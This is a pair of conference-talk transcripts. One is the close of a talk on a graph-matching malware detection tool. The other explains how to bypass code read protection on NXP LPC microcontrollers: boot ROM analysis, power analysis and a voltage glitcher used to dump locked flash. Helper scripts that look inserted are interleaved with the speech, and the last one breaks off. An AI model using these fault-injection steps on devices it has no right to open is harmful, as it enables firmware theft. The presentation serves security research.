So the problem is this one. We have a pattern that says I want to match one to four any instruction. Then I want to match a XOR, then I want to match a CULL. Then I say, okay, this is our following instruction. So it's one to five anything. Then XOR, then a CULL. And so there is a lazy repeat here. We can either put true or false. If we put true, it will mean that we want to take the least number of instructions. If we put false, we want to take the maximum number of instructions. So we will see how to match this pattern on the binary graph that would have a push, then a push, then XOR, then another XOR, then a CULL. So with the current tool set, if we put lazy repeat to true, the matching for the any node will stop once it switches XOR. So for any, it will take push, push, then it will stop. Then the XOR node will match the XOR. Then the CULL node will try to match XOR. It doesn't work, so there is no match. So it doesn't work with lazy repeat at true. If we put lazy repeat at false, so the any node will try to match the maximum number of instructions. So the problem is it is greedy. So the any node will match push, push, XOR and XOR because it matches four instructions. And then we get to the XOR node that finds a CULL. So it doesn't match. It doesn't work either. So there is no way for our tool now to match this binary thing with this pattern. But it is counter-intuitive because as with regular expressions, we would like to say, okay, I don't care if any takes one, two, three or four instructions, I would like to test them all. So of course the solution, maybe also for grab V2, would be to try every number of repetitions, so one, two, three, four. Of course it will be slower, so we will need to watch out for an impact on performance. Okay, we have a lot of more ideas that we would like to implement in the patterns. One thing that is limited also with the current version is that for basic blocks, we only have instructions on the condition on basic blocks for now will apply to every node. And what we would like to say is I want to find you a basic block that has at least one XOR instruction or find you a basic block that has at least two XOR instructions and one compare instruction. That we cannot do for now, so maybe we will also work on that later. So we said that children are numbered. So you have to specify when you do the edges if you're talking about trial number one or trial number two. Sometimes we will want to say, okay, I don't care. So this might be the, for instance, for conditional jumps, you could say this could be the child for when the condition is fulfilled or for when the condition is not fulfilled, I don't care. So we would like to add an option that would be child number is a question mark and also the algorithm to try the both options. Then as Jonathan explained, we would like to have meta patterns in PyGrap, which would be able for us to say, okay, I have five patterns. I want a match if we find three of them. That's enough. Or we would like to say, okay, I have two patterns, P1 and P2. Find me a binary that has one match of P1 that is directly followed by a match of P2. That is, there is one instruction of P1 that has a child, an instruction of P2. We would like to do some pattern linking like that. The last point is that for now we constructed the graphs manually with writing text files. It works. It's okay when you have, when you use tweets, it's quite fast, but it would still be easier to be able to select nodes in Ida and then click export. 
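The fix sketched above for a future version — try every allowed repetition count instead of committing to the least or the greatest — is easy to picture on a toy, sequence-only model (the real tool works on graphs, and the performance concern is exactly this extra backtracking):

```python
# Toy illustration of "try every repetition count": each pattern item is
# (predicate, min_repeat, max_repeat); instructions are reduced to mnemonics.

def matches(pattern, insns):
    if not pattern:
        return not insns
    pred, lo, hi = pattern[0]
    for n in range(lo, hi + 1):                      # backtrack over repetition counts
        if len(insns) >= n and all(pred(i) for i in insns[:n]):
            if matches(pattern[1:], insns[n:]):
                return True
    return False

any_insn = lambda i: True
pattern = [(any_insn, 1, 4),
           (lambda i: i == "xor", 1, 1),
           (lambda i: i == "call", 1, 1)]

# Fails with lazy (any = 2) and with greedy (any = 4), works with any = 3:
print(matches(pattern, ["push", "push", "xor", "xor", "call"]))   # True
```

And on the idea of building patterns by selecting nodes in IDA and clicking export: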
It will generate a nice dot file with all the nodes and all the edges that you want. It will be much faster to create patterns. Okay, so this will end our talk. The conclusion is that Grap is at the same time a standard tool. It has Python bindings. We have an Ida plugin. Our goal was to create a tool that can make graph patterns that are easy to write and easy to understand. We believe it is useful for detection and automatic analysis. We showed that in Backspace and it worked. The tool is a fully open source and you can find it online at this address. As a perspective for the future, maybe for the V2, we would like to add some pattern features. We talked about parsing semantics and information from instructions. We talked about condition and basic blocks. We would like to be able to create patterns directly within Ida. And then we would like to have many more examples that work. On crypto algorithms, we want to try with AES and on packers and common packers. So this will end our talk. Thank you for listening and we will try to answer questions. Thank you for the talk. Very good talk. I was wondering if you had thought about using things since you can have capstone in Ida now. I haven't tried it. But could you just use capstone everywhere? Have you thought about that? Sorry, to use capstone in Ida? We thought about it but we have not decided yet how to do it. I'm going to do this, I guess. Thank you.
|
Disassembled binary code can be turned into a graph of instructions linked by possible execution flow (Control Flow Graph). Based on academic research on malware detection through graph matching and facing large numbers of similar files to analyze, we aim to provide accurate results to an analyst working on malware families. Our approach is a YARA-like detection tool: GRAP matches user-defined graph patterns against the CFG of a given code. GRAP is a standalone tool that takes patterns and binary files, uses a Capstone-based disassembler to obtain the CFGs from the binaries, then matches the patterns against them. Patterns are user-defined graphs with instruction conditions (“opcode is xor and arg1 is eax”) and repetition conditions (3 identical instructions, basic blocks…). The algorithm solves a simplified version of the subgraph isomorphism problem, allowing the matching to be very quick. It can be used to find generic patterns such as loops and to write signatures to detect malware variants. We also developed a plugin giving IDA the capabilities to detect and browse matches directly within the GUI. Python bindings are available to create scripts based on GRAP and extract valuable information (addresses, instructions) from matched parts. In this talk, we will introduce the algorithms used and then focus on practical use cases: detect common patterns (from the command line or within IDA), create a malware pattern, and extract information from matched instructions. The tool and the plugin will be released under an open source license.
|
10.5446/32392 (DOI)
|
My name is Chris Krulinski. I'm a hacker from Canada and I'm here today to talk about how to break the code read protection on the NXP LPC family of arm microcontrollers. So the LPC family of microcontrollers, they're a low cost 32 bit arm microcontroller. There's a variety of parts in the family. They have an internal flash ranging anywhere from 8 to 512 kilobytes and from 1 to 282 kilobytes of RAM. In parts from the family have a different set of various peripherals including the UART, USB, CAN and Ethernet controllers. There's a variety of parts in the family. They all share a lot in common. It's mostly the peripherals and the memory size that differs between them. Inside of the parts they have a boot loader for in-system programming. So this boot loader allows you to load your program into the flash area. It's quite a simple boot loader using a serial protocol. There's a list of the available commands here including to write to flash, also to read from flash using the ISP interface. There's existing software that you can use to use the ISP interface. There's a software from NXP that runs in Windows. There's a nice open source program called LPC21 ISP and there's some others too. You can write your own quite easily. They have all the documentation for this protocol and the data sheets. Inside the boot loader they have support for CRP or code read protection. They have three levels of the code read protection that they've defined. The CRP level one will disable the read command in the boot loader but it does still allow flash writes to some areas of the chip. The CRP level two will disable the read command and also disable all flash writes. Then the CRP level three will disable all the commands and it will also disable access to the boot loader entirely. You have no access to the in-system programming. Additionally, they have a fourth level that they call no ISP which doesn't disable any of the debugging features in the chip but it does disable the serial boot loader. That's an additional option. For the CRP levels one, two and three in any of these the debugging will be disabled. Here we have a flow chart showing the boot process inside the ROM boot loader inside these chips. We can see from reset it does some initialization. It will do a check to see if the code read protection at any level one, two or three is set. If the code read protection is set, it will disable the debugging. Otherwise it will enable the debug interface on JTAG. It does some other checks like checking if the watchdog flag was set and if so, then it will go back into the program because it had a reset due to watchdog. Otherwise it will continue and it will check if the code read protection level three or the no ISP are set because these ones will disable access to the boot loader. If they are not set, then it will check to see if you are holding one of the GPIO pins low that triggers the access to the boot loader. If it does not go into the boot loader, it will go into the application but before it goes into the application, it will check if it considers the flash code valid and it does this by calculating a check sum of the first area of the vectors inside flash. If this check sum is valid, then it will jump to the reset vector inside flash. Otherwise it will fall through again into the boot loader interface. Some of the chips have a USB boot loader in addition to the serial boot loader. Some of them don't support the USB. 
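On the "valid code" check mentioned in that flow chart: for the Cortex-M based LPC parts, the documented rule (quoted from memory — verify against the user manual for your part, and note the older LPC2xxx ARM7 parts use a different reserved slot) is that the reserved vector entry at offset 0x1C holds the two's complement of the sum of the first seven vectors, so the first eight 32-bit words sum to zero. A small sketch of checking and fixing up that checksum, the same fix-up flashing tools apply:

```python
# Check / fix the LPC "valid user code" checksum over the first eight vectors.
# Offset 0x1C applies to the Cortex-M parts; older LPC2xxx parts differ.
import struct

def user_code_valid(flash_image: bytes) -> bool:
    vectors = struct.unpack_from("<8I", flash_image, 0)
    return sum(vectors) & 0xFFFFFFFF == 0

def fix_checksum(flash_image: bytearray) -> None:
    first_seven = struct.unpack_from("<7I", flash_image, 0)
    struct.pack_into("<I", flash_image, 0x1C, (-sum(first_seven)) & 0xFFFFFFFF)

img = bytearray(64)                                   # stand-in flash image start
struct.pack_into("<2I", img, 0, 0x10002000, 0xC5)     # made-up stack pointer / reset vector
fix_checksum(img)
print(user_code_valid(bytes(img)))                    # True -> ROM would jump to the app
```

Back to the boot flow and the USB bootloader.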
If they do support the USB boot loader, then it will determine if you have the USB connected by checking if there is a high voltage on the V bus pin of the chip. If you want to disable the USB interface and access the serial boot loader instead, you have to hold the V bus pin low. If all these conditions are met, then eventually it will execute the serial boot loader out of ROM. We can see that they use a 32-bit word in flash to define if the code read protection is set. They have four values which will enable some level of code protection inside of this chip. If any of those four possibilities of the 32-bit word are set in this location in flash, then there will be some locking set. If any other value exists in this location in flash, then the chip is going to start up in the boot loader and be totally unlocked. Out of the possible 32-bit words, there are four of them that will lock the chip, or 4,294,967,292 that will result in the chip being unlocked. So we can see already that this might be a rather fragile lock on the chip, that there is some good chance that we might be able to trigger it to read incorrectly. This is the memory map of one of the parts. This is for the LPC 1343 chip. The other members of the family are quite similar as far as the memory layout. Some blocks might be moved around. We can see that the flash starts at address 0, and they also list where the boot ROM is starting at address 1FFF0000, and they have a 16-k byte boot loader inside of this chip. Most of them have a very similar boot ROM. Some of the parts, like the LPC 2148, actually have a boot loader inside of a flash area at a different memory location, but in general, they're quite similar to this setup. So here are just some quick links for some useful tools for using the LPC chips. The first one at the top is the LPC 21 ISP. This is a nice, simple open-source software to program the LPC family microcontrollers from the command line. And then also, I've shown some links for various example codes to use the GCC ARM compiler to be able to write programs that will run on these chips. Another option is to use the official tool chain supported by NXP, but generally, that's going to be Windows compilers, and some of them you actually have to pay for to get the full feature set. So it's kind of nice to be able to work with GCC and have a more standard tool chain where everything is free and open. So to start out, we're going to want to see what they're actually doing inside of the boot ROM. So I write a very simple program that I can load inside of a blank LPC chip, and I put a function like this inside that simply sets up a pointer and start with the pointer pointing to the beginning of boot ROM, and then read one byte at a time and output them out the serial port. Because the example code that's available is quite nice and complete and supports a lot of the standard C library functions. We have even printf, so it makes it nice and simple and clean to be able to read the memory out of this chip. So using a function like this, we can load it into the chip and have it send us the contents of the boot ROM so that we can see exactly what it's doing inside the boot loader. So this is the beginning of the boot loader, the first code that executes after the chip is reset. This is a disassembly of a part of the code. So we can see that the very first thing that it does is it's going to check if the CRP level 1, 2, or 3 is set, and if they are set, then it will disable the debugging. 
Otherwise it will enable the debugging. So we can see what they do here is if the CRP 1, 2, or 3 are set, then they're writing the value 8.7654321 to the register at 400483F0, which isn't documented, but clearly this register is what enables or disables the debugging. So again, if they write the one specific value to this register, it will disable the debugging interface. If anything else is written to this register, then it will actually enable the debugging interface because the chip is considered unlocked. So in the first part here, they're setting up whether the debugging is enabled or not, and now we can continue on to the next piece. I've cut out just segments of the boot ROM to cut out the irrelevant part so that we're not looking at too much disassembly here. So what they will do next is they will look at the value in Flash that defines if the code read protection is set, and they're reading this value out of Flash, and they're storing it in a variable inside of RAM. And this disassembly, I've labeled this variable CRPValue in RAM. And then later on in the code, we can see that they start to do some comparisons to see what CRP level is set. In the middle segment of the disassembly here, they're checking if the CRP level 3 is set, or if the no ISP value is set, and if either of those are set, then it's going to jump into the application. Otherwise, it's going to check to see if we're holding a GPIO pin load to trigger the boot loader. And they're doing this comparison not directly against the value in Flash, but they compare against the variable that they've loaded into RAM already. In this screen here, this is a function that I call select boot loader. The boot code is going to end up in this routine if we don't have the no ISP or the CRP3 enabled, and if the boot loader has been triggered. So at this point, it's going to check to see if it should go into the USB boot loader or the serial boot loader. And again, we can see that they do the same thing where they're reading the value from Flash for the CRP, and they're storing it in, again, the same variable in RAM. So at this point, they have the CRP value if it's set, stored in their variable in RAM, and they're ready to enter the serial ISP software. So in the serial ISP routine, this is the very beginning of it, we can see that they set up some registers, and they're setting registers R6 and R7 here to be initialized with the values that would enable CRP level 2 or CRP level 3, and then they're continuing directly into their command loop where you can send the ISP commands via the serial interface. This is deeper into the ISP routine. This is after you've sent it a command, and it is going to check the command to see if it's on the list of commands that would be disabled if code read protection is set. So we can see that right from the very top, I've started where if it's a command such as a read or a write to Flash, then it will set register R2 to 1, which indicates later in the program that this is a command that would be disabled by CRP, and then they're going to continue and they're going to check to see which CRP value is actually set. Now if we look here, we can see that they're actually doing the CRP check against this variable that they have in RAM at this point. So inside of the serial bootloader, when they want to know is this command allowed, they're always comparing the CRP value, the lock value, against this value that they've already loaded into their variable in RAM. 
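Pulling the reverse-engineered flow together, here is a toy Python model of the decisions the ROM makes from that one cached CRP word. The behaviour (write 0x87654321 to the undocumented register at 0x400483F0 to disable debug, cache the word in RAM, gate ISP entry and the read command on the cached copy) is what the disassembly above shows; the four magic CRP word values themselves are the ones documented in NXP's user manuals, quoted from memory here, so double-check them for your exact part.

```python
# Toy model of the ROM's CRP handling: one read from flash, cached in RAM,
# and every later decision consults only the cached copy - which is why a
# single well-timed glitch opens everything up for the rest of the session.

CRP1, CRP2, CRP3, NO_ISP = 0x12345678, 0x87654321, 0x43218765, 0x4E697370
LOCKING = {CRP1, CRP2, CRP3}     # any of these makes the ROM write the magic
                                 # 0x87654321 to 0x400483F0, disabling debug

def boot(crp_word_from_flash: int):
    crp_cached = crp_word_from_flash                    # single flash read, kept in RAM
    debug_disabled    = crp_cached in LOCKING
    isp_entry_allowed = crp_cached not in (CRP3, NO_ISP)
    isp_read_allowed  = crp_cached not in LOCKING       # the 'R' command check uses the cache
    return debug_disabled, isp_entry_allowed, isp_read_allowed

print(boot(CRP2))       # (True, True, False): bootloader reachable, reads blocked
print(boot(CRP2 ^ 1))   # (False, True, True): one corrupted bit and it is wide open
```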
So at this point, they're not even looking into the Flash anymore to see if it's locked. They've loaded this value after reset, and now they're able to just check in RAM every time. So to continue from here, I am ready to start testing on the chips. So I took a variety of chips from the family and I mounted them on different breadboards. So this is one of the smaller members of the LPC family. This is an LPC 812 on a breakout board. This is another smaller member of the family. This is the LPC 1114. This is the LPC 1751, and you can see I've only populated some pins on the breakout board. This is because really I only need to power the chip to enter the bootloader mode and to have the serial access. I'm not interested in so many of the other peripherals, so I try to keep it simple. This is an LPC 2101, another member of the family. And this is an LPC 2148 on a nicer breakout board that I found with the ZIF socket. That's a lot more convenient to work with if you're going to be changing between a lot of different chips. And then another option is also to use a pre-made development board. This is an AlieMax board for the LPC 1343 chip. This one has been modified a little bit. I've removed two of the capacitors, capacitors C1 and C4. These are the filter capacitors on the VDD pins because I'm planning to glitch this chip and that's going to involve quickly dropping out the power supply, so I don't want those filter capacitors. They're going to be trouble for me. Also I've cut two traces on the board, which are for the VDD and VDD IO signals. This development board is set up nicely that they give you a spot specifically to cut if you want to disable the power supply from the board. So I've installed jumpers on those locations so I can connect with my own power connection. And then also I've added this green wire and this green wire is just connected between the ground pin on the debug port and the VBUS signal going into the chip because normally this development board is designed so that you'll be using the USB boot loader. So in order to disable the USB boot loader, I've added this green wire which is simply holding VBUS pin low, so we'll enter the serial boot loader instead. So this is my basic setup that I use for glitching chips. At the top I have an oscilloscope that I use so that I can actually see a little bit of what's going on. Below that I have a power supply, a dual output adjustable power supply so I can set two voltage levels independently. In front of that I have a little mess of wires and development boards with an Atmel X Mega board that I use for controlling my glitch and for doing the serial connection to the chip. I have one of the LPC boards on a breakout board. I have another small breadboard with the actual glitcher circuit that will get into it more in depth in a few more slides. And then I have the oscilloscope probes connecting. In the background I have the computer that it's connected to. On my computer I'm just running Minicom, I have just a direct serial interface to the X Mega board that I'm going to be using and I run a little terminal program within the X Mega and this is my interface for the glitcher. So to have a bit of an idea of what's going on inside of the chip during boot up I do some simple power analysis on this chip. To do a power analysis I connect a 10 ohm resistor in series with the ground signal going to the chip. 
These measurements are from an LPC 812 chip and again as I noted it's simply a 10 ohm resistor in series with ground and I measure the voltage across this resistor. So as the power consumption of the chip is changing you see a difference in the voltage measured across this resistor and then on the oscilloscope we can get these traces which look quite noisy but still we can see that there's some pattern to it. The image at the top left is showing immediately after resetting the chip and entering into the application and then the image at the bottom right is showing when we reset the chip and it enters into the boot loader. So we can see that the left half of the image is quite similar between the two of them and then around the middle of the oscilloscope image we start to see that there's some differences in there. We can't see exactly which instructions are being executed but we can clearly see that there is some difference in the code path that's being taken. So this is a measurement of the same thing. Again it's the reset and starting the application comparing to reset and starting the boot loader. I've marked with cursors on the on the scope here so we can see with the yellow lines the exact point at which the code flow starts to differ. So we can gather from this that the part between the two yellow cursors at the left of the image this is the boot ROM code, the initialization and the initial checking of the code read protection and then everything to the right of the cursor differs depending on whether we've triggered the boot loader mode or whether it's going directly into the application. So this is a video showing the live image from the oscilloscope. Right now it's starting into the boot loader mode. It was in the application mode. This isn't going into the boot loader mode. Now it's switching back to the application mode. So even though it's noisy and it jumps around you can see some different patterns as it switches between the boot loader and application mode. So even with these dirty signals we're not going to get all of the detail that we might really want but it's definitely enough to be able to see if the code flow is taking the path that we expect or if it's going in some different direction. This is showing on another chip. This is looking at the LPC 1343. So the very top trace I'm measuring the power consumption using a resistor in series with the VDD pins and then near the bottom I'm measuring the power supply with the resistor in series with the ground pins. So you can do the power analysis on the VDD or on the ground. Generally you'll get a nicer cleaner signal measuring off the ground. I mean we can see some differences in this image on either trace whether we're looking at the VDD or the ground but clearly the bottom tracer with the ground is much easier to actually see some differences in what's going on as we trigger between the boot loader and the application mode. So to get into glitching my glitcher is based entirely around this chip. This is a Max 4619 chip. This is almost the entire glitching circuit right here in this one chip. The Max 4619 is a chip that contains three single pole double throw switches with a fast switching time and a low series resistance when they're switched on. So what this means is that we're able to switch between two inputs and that will adjust the output level and we have switching times that are as low as 10 to 15 nanoseconds. 
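A small host-side sketch of turning those scope captures into a concrete glitch timing: export one averaged trace per boot path (application versus bootloader), subtract, and look for the first sample where they diverge beyond the noise floor. The file names, sample rate and threshold below are made up; single captures are noisy, so averaging several per case before comparing helps a lot.

```python
# Find the point where the two boot paths diverge in the power traces.
import numpy as np

app  = np.loadtxt("trace_app.csv",  delimiter=",")   # hypothetical scope exports,
boot = np.loadtxt("trace_boot.csv", delimiter=",")   # one value per sample
n = min(len(app), len(boot))
diff = np.abs(app[:n] - boot[:n])

noise = 3 * diff[: n // 10].std()        # estimate noise from the shared early part
above = np.nonzero(diff > noise)[0]
if above.size:
    SAMPLE_RATE = 100e6                  # assumed 100 MS/s capture
    print(f"paths diverge around sample {above[0]} "
          f"(~{above[0] / SAMPLE_RATE * 1e6:.2f} us after reset)")
else:
    print("no divergence found - capture longer or average more traces")
```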
So this means that we can very quickly switch between two voltage sources and this is how we'll actually produce the glitch output. So this is a diagram again from the Max 4619 datasheet just showing the actual circuit inside the Max 4619 and you can see it's quite simple. It really is just three switches inside. So we have three inputs, Y0, Y1, X0, X1, Z0, Z1 and then the three outputs are the X, Y and Z outputs and the controls for these switches which selects the zero input or the one input are A, B and C. There's also an enable pin which if you hold it low then the Max 4619 will output voltage to the chip. If we release that high then it won't have any output to the chip at all so we can actually use this to be able to completely cut off the power supply to the chip. So this is the schematic of the glitcher circuit that I use. All that I've done here is I tie the three switches in the chip together in parallel. So I do this, it helps to lower the effective resistance that we see through the chip so it has a little bit less effect on the voltage level itself. They'll still switch together very fast. I only actually need one switch because I'm only switching one thing, only the VDD towards the chip. So I've tied the Y1, Z1, X1 signals together and I've tied the Y0, Z0, X0 signals together the same with the control signals A, B, C. So the outputs from X, Y and Z1, sorry the inputs to X, Y and Z1 are coming from my power supply and those will be the glitch voltage level that I set while the input 0 is the normal power supply level that I set. And then the outputs X, Y and Z are the output actually going to the target chip. So to control this I just need two signals, I'm running these to my Atmel XMega development board that I use. So the enable pin, I run to the XMega port A3 which allows me to enable or disable the output to the chip entirely. And then the control pins A, B, C, I'm running to another XMega port A0 and this is how I'm going to switch between the normal and the glitch voltage levels. So this is the actual circuit with the Max4619. This is basically the whole glitcher board minus the XMega that I use as the microcontroller. I like the solderless breadboards, they're very convenient to work on, they allow you to change your ideas very quickly and test different things out. Any problems with high frequency noise or anything like that, really for most of the projects that I do I don't notice too much of a problem with it, I'm able to ignore it and kind of do things the cheap and easy way. So I enjoy that I'm able to just pop a chip into the breadboard, connect these wires and in a few minutes I've built a glitcher like this. So this is a picture of an LPC812 chip connected to the glitcher. As you can see I'm very careful always with my wiring, keep everything nice and neat. But really as I said the noise and things that you see in most cases it's only a minor annoyance and everything's actually still going to work. So I like this quick and dirty method of working. This is another angle of the same glitcher setup, again showing off the nice clean wiring that I tend to do. So here I have everything labeled, the blue development board is an XMega A1 explained board, this has an Atmel XMega chip which is an AVR that runs at 32 MHz. Then below that on the black breadboard I have the Max4619 Glitter circuit. You can see that I have a 10 ohm resistor that I put in series with the ground going to the LPC812. That's how I'm doing the power analysis. 
So I simply put that in series with ground and I connect the oscilloscope probe to the side of the resistor that the LPC chip is connected to and that's going to be my power analysis signal. And then at the top right you can see that there's the LPC812 that I've mounted on a breadboard for testing. For the power supply to control the VDD levels to this chip I use a benchtop power supply so it has two outputs. The first output I can set the normal VDD level that the chip will run at and then I'm going to use the second output and that's how I'm going to adjust the level of the voltage drop while I actually perform a glitch on the chip. There's lots of different options actually for supplying power to the chip or you could build a circuit and be able to have it digitally controllable. Personally I like the hands-on method of having a benchtop power supply like this. It lets me quickly connect different things and test different ideas if I want and I find it a very nice way to work to actually be able to adjust the knobs and see the difference in the output and it's nice and quick and easy just to connect everything together. So this shows the development board together with the breadboard with the glitcher circuit. So this is essentially the whole glitcher circuit minus the target board with the LPC chip and without the power supply. So at the very top we can see where the inputs from the adjustable power supply will come from. So the white wire is going to be ground from the power supply. The red wire is the normal voltage level and the green wire is the second voltage level that we'll use for the glitch. Then we have the VDD and ground output towards the target chip and then other than this we'll also have the serial port, the UART connected between the LPC chip and the explained development board. But as far as the glitching circuit goes this is the entire system right here. That's very dark. So I don't know how well you can see this because of the colors that I have but this is the C and December code that I run inside of the XMega chip to actually control the glitching. So the basic concept is that I use the out instruction on the AVR chip. So the out instruction is a single cycle opcode. So this means that if we're going to execute a series of out instructions we can actually change the output signal on the port at every clock cycle at 32 MHz. So that means that we could actually trigger a glitch that would have a length as low as 31.25 nanoseconds. It'll be a little bit different than that actually because of the switch on and off time within the Max4619. But generally speaking it can do quite short glitches. So what I'm doing here is I have a series of out instructions that will set the level on this output pin. And before I call my glitch function I set up some variables to define what kind of a glitch waveform that I want. So I can have it anywhere from one cycle at 32 MHz up to eight clock cycles at 32 MHz and it can be changed very easily within software and I don't have to have a separate routine for each different length of glitch. So this lets me kind of change things on the fly and still have the flexibility to have these very short glitches. So to start trying to glitch the chip the easiest way is if I'm able to execute a glitch against code that I know exactly what the code is doing and since these are common micro controllers I can buy a blank chip and I can load my own code inside. So using the GCC arm tool chain I write some simple C code. 
So what I have here is a while loop that will continue executing forever and I have two variables that I'll use inside of this loop A and B. And so I'll initialize B to a value that I have set as number of glitch loops which in the case of this test I actually have set to 16. I will toggle some GPIO pins. This allows me to have nice synchronization between the LPC chip and the AVR chip that will do glitching so that I have my timing nice and precise. And then I have in the middle a for loop. So this for loop is going to increment the A variable from zero until it reaches the total number of glitch loops we want to do. And during this loop it's going to decrement the B register. So what this does is normally at the end of the loop we should know that the A variable is going to end up being 16 because that's how I have the num glitch loops defined and the B variable should always be zero. At the end of this while loop then I am checking to see are the A and the B values actually what I expect. If the code is operating normally then the first condition will be true. A equals number of glitch loops and B equals zero. In this case I am printing out the serial port just a dot. This indicates that there was no glitch that the code operated normally. But if this check of the A and the B variables fails that they have a different value then I am going to print out the serial port what those values were and that indicates that some kind of a glitch actually occurred that the code did not execute normally like it would. So I wrote this test code in C so we can actually look at the assembler code that would be generated by GCC to see exactly what instructions are going to be executed that we are going to try to glitch. Another option would have been to write the code directly in assembler but it's such a simple test program and the idea is only to see if it has an effect so I prefer to work in C. It's a nice, easy, convenient way to work. It's a little bit nicer than having to write an assembler for everything. But we can see that what the compiler did here is really quite simple except for all the extra noise from the listing. That basically it starts with A equals zero. It decrements B, it increments A and it checks to see if we have hit the end of the number of glitch loops yet. So this video is showing what I see through Minicom when I'm running the test code. So all these dots mean that no glitch has happened. So I'm waiting for this for loop to start and then I'll do a quick glitch and as this is running I'm adjusting the voltage level on the power supply. So we can see when I start to lower the voltage on the power supply we start to see some strange responses come out of the chip. So all of these lines showing what A and B are are indicating that a glitch occurred. The X's that come up that indicates that the chip reset and we can see a bunch of X's come up there at once as I've dropped the voltage level even lower. So because I start to see a lot of resets with the voltage level so low at that point I increase the voltage level a little bit and what I'm doing here is trying to find kind of the sweet spot where the chip runs and it still has the most strange effects coming when I glitch inside this for loop. So we can see that normally the value at A should be X10 and the value in B should be zero but we ought all kinds of different values depending on exactly which instruction that we glitched within the loop. We have lots of results that are like A is 5003, 009. 
This will be because A is actually pointing to the location within RAM where that variable was stored. So because it wasn't just a loop where it was incrementing registers it would actually have variables in RAM so we ended up with a pointer instead of the actual value there because of where the glitch broke the loop. But we have a variety of different effects but the main point here is just that we're having some effect on the chip. The code isn't operating normally. All that I'm doing at this point is dropping the VDD supply to the chip very briefly during that loop. So by doing this kind of a test this lets me have a nice area to target where I can kind of tune things in and find what length of a glitch and what voltage levels will actually most likely have a good effect on the chip. So this is showing the oscilloscope image along with the mini-com screenshot showing of actually glitching during this target loop. So the top channel is our power analysis channel. The middle channel there is showing a GPIO pin. It's pulling the GPIO low while it's within our for loop that we're targeting. And the bottom line there was just reset so it's always high during this. So we can see it's attempting to glitch and it's attempting to glitch and then finally it stops and we can see that when the glitch actually had an effect our loop got much shorter. We can see because the GPIO was held lower for less time and on the bottom window there we can see that we ended up with the value A being 5003,0008. So again it was set to the pointer value not the actual value of the variable. And we can see that the B variable ended up with hex E. So B would have started out with hex 10 and it got decimated twice to F and then to E and then at that point we broke out of the loop. So the loop is shorter and the B variable matches the length of the loop because it didn't count down all the way. This is showing several screenshots of glitching and seeing different effects out of the chip. So at the top left we have a screenshot of when we did the glitch but it didn't actually have any effect. So the ending result in variable A was hex 10 and B was zero. Below that we can see that the glitch had an effect. A ended up with the normal value but B ended up with the value FF, FF, FF, F1. So what has actually happened here is we can see that the loop was extended a little bit and so the B variable actually got decimated more times than normal so it ended up with the wrong value. At the top right we can see again that the loop broke early. We have A being set to a pointer value and then we have B set to hex E instead of being decimated all the way down to zero. And at the bottom right we have another result that comes up and again it's similar to the one at the bottom left but in this case B was decimated down to FF, FF, FF, F2 instead. So now if we adjust the glitch to hit at a different part of the loop I've changed the timing so I'm waiting a few more clock cycles before I glitch. Here it has an effect again so we can see that the loop was shortened because of the glitch. We broke out of this for loop and we can see again that the variable A is set to this pointer value it tends to get left at and the variable B is now set to hex A. So the variable D got decimated a few more times because we waited further through the for loop to glitch. 
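While tuning by hand like this works, it also lends itself to simple host-side bookkeeping: read whatever the target prints back (through the XMega pass-through) and tally the outcomes, so you can tell at a glance whether a given voltage and pulse width mostly does nothing, mostly resets the chip, or actually corrupts the loop. This sketch uses pyserial; the port name, baud rate and the exact output strings are assumptions — they are whatever your test firmware prints.

```python
# Tally glitch outcomes from the target's serial output:
#   '.'           -> loop ran normally (no effect)
#   'X'           -> chip reset (glitch too aggressive / VDD too low)
#   anything else -> corrupted A/B values (the interesting case)
import serial
from collections import Counter

port = serial.Serial("/dev/ttyUSB0", 115200, timeout=1)   # assumed port/baud
stats = Counter()

for _ in range(1000):                                      # one tuning run
    line = port.readline().decode(errors="replace").strip()
    if not line:
        continue
    if set(line) <= {"."}:
        stats["normal"] += 1
    elif "X" in line:
        stats["reset"] += 1
    else:
        stats["corrupted"] += 1
        print("glitch effect:", line)        # e.g. "A=10000008 B=0000000E"

print(dict(stats))   # look for settings where 'corrupted' appears without many resets
```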
And here we have screenshots showing the different results that we have when we glitch at this timing location versus the first one so we've waited through a couple more rounds of the for loop. Now something else that we can notice in these images if you look especially at the top left image you can see when the for loop executes and we can see a little pattern there and that pattern we see repeating exactly 16 times. So from the power analysis we don't necessarily know what instructions execute but it really is very clear that there's a for loop that's executing exactly 16 times and if we compare to the bottom left image then you see that it hasn't executed 16 times. You see it executes about five times and then we have the glitch the big spike on the power consumption and then it completes one more loop and then it exits. So using this power analysis is very nice to have a much better idea of what's going on inside of the chip. It doesn't tell you everything but you can really get a lot of clues out of it. So now this is showing a video of from reset. We can see the channel four there the bottom one in the oscilloscope is the reset signal so from the rising edge of reset is where we're starting to trigger and then the top trace again is the power analysis and as it begins here it's entering into the application mode and we're not able to enter the boot loader mode because we have the no ISP set but by glitching near the location where previously we saw the difference between entering boot loader or entering application we can actually glitch at this spot and we're able to see very clearly on the power analysis that instead of going into the application like it is now when the glitch finally hits and lands the following trace on the power analysis is showing that we're going into the boot loader instead. We can verify this by sending a command to the chip and it does actually respond to the boot loader. So after we've done this in my very simple X mega code what I've done is instead of implementing the entire ISP code myself I simply do a serial port pass through so I run this process I glitch I'm able to enter the boot loader even though it's been disabled and then after this step I can drop back to the command line and I can use one of the commonly available tools this is now able to read the flash out of an LPC 1343 chip so it reads it through the normal ISP interface because as far as it's concerned this is an unlocked chip we can see the flash contents and it really is just that simple. We've been able to identify the locations in the boot ROM startup where it's checking the code read protection values and where it's checking if it's allowed to access the boot loader. We perform a glitch at that location it's able to corrupt the code flow but the chip still operates other than a few corrupted instructions so we've entered the boot loader once we've entered the boot loader then we can drop back to any of the LPC programming tools and it's able to read the chip normally as if it was an entirely unlocked chip. So I've uploaded my test code for the Glitcher to GitHub it's not exactly production ready code but it's what I used it does mostly work it's not well documented but I guess that's kind of normal. So this is code for the explain development board the AVR chip and this has my serial interface code and also all the timing code for the glitches to control the max 4619 and perform our glitching. 
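The hand-off step can be scripted too: fire the glitch, then immediately run the documented ISP autobaud handshake (send '?', expect "Synchronized") to see whether you actually landed in the bootloader, and only then hand the port over to a normal programming tool. The port name and timing below are assumptions, and the lpc21isp invocation is quoted from memory — check its help output for the exact arguments.

```python
# After a glitch attempt: probe for the ISP bootloader, then hand off.
import serial, subprocess

def in_bootloader(port_name="/dev/ttyUSB0", baud=115200) -> bool:
    with serial.Serial(port_name, baud, timeout=0.2) as p:
        p.write(b"?")                       # ISP autobaud probe
        return b"Synchronized" in p.read(32)

# arm_glitcher_and_reset_target()           # whatever talks to the XMega (not shown)
if in_bootloader():
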